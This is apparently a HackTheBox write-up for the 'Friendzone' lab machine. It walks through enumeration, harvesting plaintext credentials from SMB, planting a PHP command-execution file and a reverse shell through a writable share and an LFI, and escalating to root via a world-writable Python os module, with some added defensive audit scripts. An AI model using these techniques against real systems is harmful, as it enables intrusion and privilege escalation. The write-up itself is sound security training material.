Friendzone is an easy-rated Linux machine from HackTheBox, created by askar. In this post, my IP is 10.10.14.24 and the target IP is 10.129.191.183.
Friendzone is one of those easy boxes that are still challenging. At the start there is a lot of noise and plenty of rabbit holes that waste your time. The good thing about this machine is that it mixes many techniques: enumerating SMB, exploiting an LFI, dropping a PHP file, and so on. It's a fun machine.
Gathering Information
The first steps are about gathering basic information on the target, using nmap and looking through the website.
Local Terminal
$ ping -c 1 10.129.191.183
Pinging 10.129.191.183 with 32 bytes of data:
Reply from 10.129.191.183: bytes=32 time=176ms TTL=63
Reply from 10.129.191.183: bytes=32 time=188ms TTL=63
Reply from 10.129.191.183: bytes=32 time=233ms TTL=63
Reply from 10.129.191.183: bytes=32 time=168ms TTL=63
Ping statistics for 10.129.191.183:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 168ms, Maximum = 233ms, Average = 191ms
From the TTL of 63 (a default of 64 minus one hop), we can assume it is a Linux machine.
Local Terminal
$ nmap -p- --open -sS --min-rate 5000 -vvv -n 10.129.191.183 -oG Ports
Nmap scan report for 10.129.191.183
Host is up, received echo-reply ttl 63 (0.79s latency).
Scanned at 2023-05-24 09:42:09 Pacific SA Standard Time for 25s
Not shown: 39993 closed tcp ports (reset), 25535 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 63
22/tcp open ssh syn-ack ttl 63
53/tcp open domain syn-ack ttl 63
80/tcp open http syn-ack ttl 63
139/tcp open netbios-ssn syn-ack ttl 63
443/tcp open https syn-ack ttl 63
445/tcp open microsoft-ds syn-ack ttl 63
Read data files from: C:\Program Files (x86)\Nmap
Nmap done: 1 IP address (1 host up) scanned in 25.41 seconds
Raw packets sent: 106042 (4.666MB) | Rcvd: 42746 (1.710MB)
Local Terminal
$ nmap -sC -sV -p 21,22,53,80,139,443,445 10.129.191.183 -oN Target
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-24 09:44 Pacific SA Standard Time
Nmap scan report for 10.129.191.183
Host is up (0.18s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
| 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Friend Zone Escape software
|_http-server-header: Apache/2.4.29 (Ubuntu)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.29
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after: 2018-11-04T21:02:30
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.29 (Ubuntu)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2023-05-24T13:44:19
|_ start_date: N/A
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: friendzone
| NetBIOS computer name: FRIENDZONE\x00
| Domain name: \x00
| FQDN: friendzone
|_ System time: 2023-05-24T16:44:20+03:00
|_clock-skew: mean: -59m58s, deviation: 1h43m54s, median: 0s
FTP is open on port 21, so we check whether anonymous login is allowed.
Local Terminal
$ ftp 10.129.191.183
Connected to 10.129.191.183.
220 (vsFTPd 3.0.3)
Name (10.129.191.183:root): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed
It doesn't work. The HTTPS service on port 443 can still leak information through its certificate, which we can read with openssl.
Local Terminal
$ openssl s_client -connect 10.129.191.183:443
CONNECTED(00000003)
Cant use SSL_get_servername
depth=0 C = JO, ST = CODERED, L = AMMAN, O = CODERED, OU = CODERED, CN = friendzone.red, emailAddress = haha@friendzone.red
verify error:num=18:self-signed certificate
verify return:1
depth=0 C = JO, ST = CODERED, L = AMMAN, O = CODERED, OU = CODERED, CN = friendzone.red, emailAddress = haha@friendzone.red
verify error:num=10:certificate has expired
notAfter=Nov 4 21:02:30 2018 GMT
verify return:1
depth=0 C = JO, ST = CODERED, L = AMMAN, O = CODERED, OU = CODERED, CN = friendzone.red, emailAddress = haha@friendzone.red
notAfter=Nov 4 21:02:30 2018 GMT
verify return:1
---
Certificate chain
0 s:C = JO, ST = CODERED, L = AMMAN, O = CODERED, OU = CODERED, CN = friendzone.red, emailAddress = haha@friendzone.red
i:C = JO, ST = CODERED, L = AMMAN, O = CODERED, OU = CODERED, CN = friendzone.red, emailAddress = haha@friendzone.red
a:PKEY: rsaEncryption, 2048 (bit); sigalg: RSA-SHA256
v:NotBefore: Oct 5 21:02:30 2018 GMT; NotAfter: Nov 4 21:02:30 2018 GMT
---
Server certificate
-----BEGIN CERTIFICATE-----
<...> # Unnecessary information
-----END CERTIFICATE-----
subject=C = JO, ST = CODERED, L = AMMAN, O = CODERED, OU = CODERED, CN = friendzone.red, emailAddress = haha@friendzone.red
issuer=C = JO, ST = CODERED, L = AMMAN, O = CODERED, OU = CODERED, CN = friendzone.red, emailAddress = haha@friendzone.red
---
No client certificate CA names sent
Peer signing digest: SHA256
Peer signature type: RSA
Server Temp Key: X25519, 253 bits
---
SSL handshake has read 1677 bytes and written 386 bytes
Verification error: certificate has expired
---
New, TLSv1.2, Cipher is ECDHE-RSA-AES256-GCM-SHA384
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
SSL-Session:
Protocol : TLSv1.2
Cipher : ECDHE-RSA-AES256-GCM-SHA384
Session-ID: 9463F6CBBB0671B5500A84FB494E988FAB498146CC26C50C15A05DC344B6847D
Session-ID-ctx:
Master-Key: 673175AB9328562B2F24180E4CEE79BBDF47F65472CA8EB708499ACB0A26903A38524E095BFBD51339B4056350435CE3
PSK identity: None
PSK identity hint: None
SRP username: None
TLS session ticket lifetime hint: 300 (seconds)
TLS session ticket:
<...> # Unnecessary information
Start Time: 1684937022
Timeout : 7200 (sec)
Verify return code: 10 (certificate has expired)
Extended master secret: yes
---
There is an email (haha@friendzone.red) and a domain (CN = friendzone.red). So that the name resolves to the target instead of a public IP, we need to add it to /etc/hosts.
Another email turns up, info@friendzoneportal.red, and with it another domain, friendzoneportal.red; remember to add that one to /etc/hosts as well. If you are using Windows, edit C:\Windows\System32\drivers\etc\hosts instead.
It always changes and uses base64, but decoding it yields nothing useful.
So we got nothing; let's check the nmap information again and test other channels.
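Since the certificate is where these hostnames come from, here is an added helper (my own example, not part of the original writeup) that parses the subject/issuer lines printed by openssl s_client and lists the hostnames and email addresses they contain, then turns them into /etc/hosts entries. It assumes the one-line DN format shown above, with ", " between attributes and no escaped commas inside values; the sample output embedded in it is constructed from the lines above.

```python
"""Extract hostnames and e-mail addresses from the DN lines that
`openssl s_client` prints, and build the /etc/hosts entries they imply.

Added example, not from the original writeup. Assumes openssl's one-line
DN format: attributes separated by ", ", each written as "KEY = value",
with no escaped commas inside values.
"""
import re

# Constructed sample: the relevant lines from the s_client output above.
SAMPLE_OUTPUT = """\
CONNECTED(00000003)
depth=0 C = JO, ST = CODERED, L = AMMAN, O = CODERED, OU = CODERED, CN = friendzone.red, emailAddress = haha@friendzone.red
verify error:num=18:self-signed certificate
verify return:1
subject=C = JO, ST = CODERED, L = AMMAN, O = CODERED, OU = CODERED, CN = friendzone.red, emailAddress = haha@friendzone.red
issuer=C = JO, ST = CODERED, L = AMMAN, O = CODERED, OU = CODERED, CN = friendzone.red, emailAddress = haha@friendzone.red
Verify return code: 10 (certificate has expired)
"""

# Lines that carry a DN: "subject=...", "issuer=..." and "depth=N ...".
DN_LINE = re.compile(r"^(?:subject=|issuer=|depth=\d+ )(.*)$")


def parse_dn(dn):
    """Turn 'C = JO, ST = CODERED, CN = x' into {'C': 'JO', 'ST': ..., 'CN': 'x'}."""
    attrs = {}
    for part in dn.split(", "):
        if " = " not in part:
            continue
        key, value = part.split(" = ", 1)
        attrs[key.strip()] = value.strip()
    return attrs


def extract_names(output):
    """Return (hostnames, emails) found in the DN lines of s_client output.

    The CN is taken as a hostname when it contains a dot; the domain part of
    every emailAddress is added too, since it is another name worth resolving.
    """
    hosts, emails = set(), set()
    for line in output.splitlines():
        match = DN_LINE.match(line)
        if not match:
            continue
        attrs = parse_dn(match.group(1))
        cn = attrs.get("CN")
        if cn and "." in cn:
            hosts.add(cn.lower())
        mail = attrs.get("emailAddress")
        if mail and "@" in mail:
            emails.add(mail.lower())
            hosts.add(mail.split("@", 1)[1].lower())
    return sorted(hosts), sorted(emails)


def hosts_entries(ip, hostnames):
    """Format one '/etc/hosts' line per hostname pointing at the target IP."""
    return [f"{ip} {name}" for name in hostnames]


if __name__ == "__main__":
    found_hosts, found_emails = extract_names(SAMPLE_OUTPUT)
    print("emails:", ", ".join(found_emails))
    for entry in hosts_entries("10.129.191.183", found_hosts):
        print(entry)
```

The same parser works on the output of openssl x509 -noout -subject -issuer for a saved certificate, since it prints the subject and issuer in the same one-line form.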
Local Terminal
$ smbclient -L 10.129.191.183 -N
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
Files Disk FriendZone Samba Server Files /etc/Files
general Disk FriendZone Samba Server Files
Development Disk FriendZone Samba Server Files
IPC$ IPC IPC Service (FriendZone server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
Local Terminal
$ smbmap -H 10.129.191.183
[+] Guest session IP: 10.129.191.183:445 Name: friendzone.red
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
Files NO ACCESS FriendZone Samba Server Files /etc/Files
general READ ONLY FriendZone Samba Server Files
Development READ, WRITE FriendZone Samba Server Files
IPC$ NO ACCESS IPC Service (FriendZone server (Samba, Ubuntu))
The interesting shares are the ones we have permissions on: general (read only) and Development (read and write).
Local Terminal
$ smbclient //10.129.191.183/general -N
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Jan 16 17:10:51 2019
.. D 0 Tue Sep 13 11:56:24 2022
creds.txt N 57 Tue Oct 9 20:52:42 2018
3545824 blocks of size 1024. 1651340 blocks available
smb: \> get creds.txt
getting file \creds.txt of size 57 as creds.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
Go to the directory where creds.txt was downloaded and read it.
Local Terminal
$ cat creds.txt
creds for the admin THING:
admin:WORKWORKHhallelujah@#
Local Terminal
$ smbmap -H 10.129.191.183 -u 'admin' -p 'WORKWORKHhallelujah@#'
[+] Guest session IP: 10.129.191.183:445 Name: friendzone.red
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
Files NO ACCESS FriendZone Samba Server Files /etc/Files
general READ ONLY FriendZone Samba Server Files
Development READ, WRITE FriendZone Samba Server Files
IPC$ NO ACCESS IPC Service (FriendZone server (Samba, Ubuntu))
The credentials are valid, but the share permissions don't change.
Now we turn to the DNS service on port 53 and attempt a zone transfer (AXFR).
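The anonymous-readable and anonymous-writable shares are the real finding here. The following added script (not from the original writeup) parses the smbmap table above and flags every share a guest session can reach, rating writable ones highest. It assumes smbmap's table layout with a permission column of NO ACCESS, READ ONLY, READ, WRITE or WRITE ONLY; the embedded sample is constructed from the output above.

```python
"""Flag SMB shares that an unauthenticated (guest/null) session can read or
write, parsed from `smbmap -H <host>` output.

Added example, not from the original writeup. Assumes smbmap's table layout:
a share name, a permission column (NO ACCESS / READ ONLY / READ, WRITE /
WRITE ONLY) and a free-text comment.
"""
import re

# Constructed sample: the guest-session table printed above.
SMBMAP_OUTPUT = """\
[+] Guest session   IP: 10.129.191.183:445  Name: friendzone.red
        Disk                 Permissions     Comment
        ----                 -----------     -------
        print$               NO ACCESS       Printer Drivers
        Files                NO ACCESS       FriendZone Samba Server Files /etc/Files
        general              READ ONLY       FriendZone Samba Server Files
        Development          READ, WRITE     FriendZone Samba Server Files
        IPC$                 NO ACCESS       IPC Service (FriendZone server (Samba, Ubuntu))
"""

# One table row: share name, permission keyword, optional comment.
ROW = re.compile(r"^\s*(\S+)\s+(NO ACCESS|READ ONLY|READ, WRITE|WRITE ONLY)\s*(.*)$")


def parse_smbmap(output):
    """Return {share_name: permission} for every table row in the output."""
    shares = {}
    for line in output.splitlines():
        match = ROW.match(line)
        if match:
            shares[match.group(1)] = match.group(2)
    return shares


def audit_shares(output, authenticated=False):
    """Return sorted (severity, share, reason) findings.

    IPC$ is skipped because it is the named-pipe endpoint, not a file share.
    Writable shares are 'high' (arbitrary file drop), readable ones 'medium'
    (information disclosure); both are worse when no credentials were used.
    """
    findings = []
    for name, perm in parse_smbmap(output).items():
        if perm == "NO ACCESS" or name == "IPC$":
            continue
        if "WRITE" in perm:
            severity, reason = "high", "writable share"
        else:
            severity, reason = "medium", "readable share"
        if not authenticated:
            reason += " reachable without credentials"
        findings.append((severity, name, reason))
    return sorted(findings)


if __name__ == "__main__":
    for severity, share, reason in audit_shares(SMBMAP_OUTPUT):
        print(f"[{severity}] {share}: {reason}")
```

From the defender's side, the Samba fix for what this reports is to stop mapping unknown users to guest (map to guest = Never, guest ok = no on each share) and to keep shares read only = yes unless a specific group needs to write; with that, the Development share that makes the later steps possible would not be reachable anonymously.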
$ dig axfr friendzone.red @ns1.hostresolver.com.
# Some writeups say that this should work, but for some reason I want to use an axfr scan.
# You should find: https://administrator1.friendzone.red/
We can see that the website responds to the parameter timestamp when .php is appended to its value. Thanks to SMB we found a folder called Development that we can read and write; this sounds odd, but there is a chance that creating a file there and requesting it through that parameter will make something happen.
Local Terminal
$ vi test.php
test.php
<?php
echo "Hello, this is a test";
system("whoami");
?>
Local Terminal
$ smbclient //10.129.191.183/Development -N
smb: \> put test.php
smb: \> exit
$ smbclient //10.129.191.183/Development -N
smb: \> put reverse.php
smb: \> exit
Local Terminal
$ rlwrap nc -nlvp 443
Now, to work more comfortably, you need to do a Bash upgrade (a full interactive TTY).
Local Terminal
www-data@FriendZone:/var/www/admin$ ls
dashboard.php images index.html login.php timestamp.php
www-data@FriendZone:/var/www/admin$ cd ..
www-data@FriendZone:/var/www$ ls
admin friendzone friendzoneportal friendzoneportaladmin html mysql_data.conf uploads
Configuration files like "mysql_data.conf" are always worth checking.
Target Terminal [www-data]
www-data@FriendZone:/var/www$ cat mysql_data.conf
for development process this is the mysql creds for user friend
db_user=friend
db_pass=Agpyu12!0.213$
db_name=FZ
Credentials in plain text!
Target Terminal [www-data]
www-data@FriendZone:/var/www$ su friend
Password: #Try: Agpyu12!0.213$
#!/usr/bin/python
import os
to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"
print "[+] Trying to send email to %s"%to_address
#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''
#os.system(command)
# I need to edit the script later
# Sam ~ python developer
Target Terminal [Friend]
friend@FriendZone:/opt/server_admin$ ls -la /usr/lib/python2.7/os.py
-rwxrwxrwx 1 root root 25910 Jan 15 2019 /usr/lib/python2.7/os.py
# Or you can try "find -type f -writable -ls" (From "0xdf hacks stuff")
As you can see, the os module that this Python script imports is world-writable, and the script is executed by root, so we have write permission over code that root runs.
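The root cause of this privilege escalation is a writable module on the import path of a script that root runs. The following added audit script (not from the original writeup) walks a list of import directories and reports every directory and module file that group or world can write to. It defaults to the running interpreter's sys.path; the list you pass for another interpreter (for example Python 2's /usr/lib/python2.7) is an assumption about your environment, and the temporary files used to try it out are constructed for the demonstration.

```python
"""Audit Python import directories for files or directories that other users
can write to, the condition that made /usr/lib/python2.7/os.py exploitable.

Added example, not from the original writeup. Defaults to the running
interpreter's sys.path; pass another list (e.g. Python 2's path) to audit a
different interpreter.
"""
import os
import stat
import sys

# Anything the import system may load or execute from an import directory.
MODULE_SUFFIXES = (".py", ".pth", ".so")


def writable_by(path):
    """Return 'world', 'group' or None according to the write bits on path.
    The owner is assumed to be trusted (root for system library directories)."""
    try:
        mode = os.lstat(path).st_mode
    except OSError:
        return None
    if mode & stat.S_IWOTH:
        return "world"
    if mode & stat.S_IWGRP:
        return "group"
    return None


def audit_import_path(paths=None):
    """Walk each import directory and return sorted (path, kind, who) tuples
    for every directory or module file that group or world can write.

    A writable directory matters as much as a writable file: anyone can drop
    a new module there that shadows or replaces a real one.
    """
    if paths is None:
        paths = [p for p in sys.path if p]  # '' means the CWD; skip it
    findings = set()
    for base in paths:
        if not os.path.isdir(base):
            continue
        who = writable_by(base)
        if who:
            findings.add((base, "directory", who))
        for root, dirs, files in os.walk(base):
            for name in dirs:
                full = os.path.join(root, name)
                who = writable_by(full)
                if who:
                    findings.add((full, "directory", who))
            for name in files:
                if not name.endswith(MODULE_SUFFIXES):
                    continue
                full = os.path.join(root, name)
                who = writable_by(full)
                if who:
                    findings.add((full, "module", who))
    return sorted(findings)


if __name__ == "__main__":
    targets = sys.argv[1:] or None
    for path, kind, who in audit_import_path(targets):
        print(f"{who}-writable {kind}: {path}")
```

Run it as the unprivileged user on the box (python3 audit.py /usr/lib/python2.7) and it reports os.py as a world-writable module; the fix is simply chmod 644 on the file and 755 on the directories, after which a scheduled script that imports os can no longer be hijacked this way.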